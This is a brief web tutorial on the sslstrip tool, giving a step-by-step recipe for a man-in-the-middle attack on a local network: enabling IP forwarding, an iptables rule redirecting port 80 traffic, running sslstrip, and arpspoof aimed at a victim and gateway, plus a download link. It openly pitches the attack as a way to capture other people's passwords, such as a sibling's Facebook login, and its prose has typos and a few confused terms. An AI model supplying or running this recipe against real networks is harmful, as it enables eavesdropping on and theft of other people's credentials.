SSL Strip - Video Tutorial

What is SSL Strip?

SSL strip is a software that is used to sniff the data over HTTPS. The sniffer read all the data in a network with 9is send between a user and the Router but no a days SSH or "HTTPS" have made it very difficult to get useful data (Like Facebook Password of your brother in other room). So here is a tools that can even intercept the data over HTTPS.

Running sslstrip

• Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
• Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
• Run sslstrip. (sslstrip.py -l <listenPort>)
• Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router�s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

VIDEO TUTORIAL

==============

DOWNLOAD

===========

http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

References: http://www.thoughtcrime.org/software/sslstrip/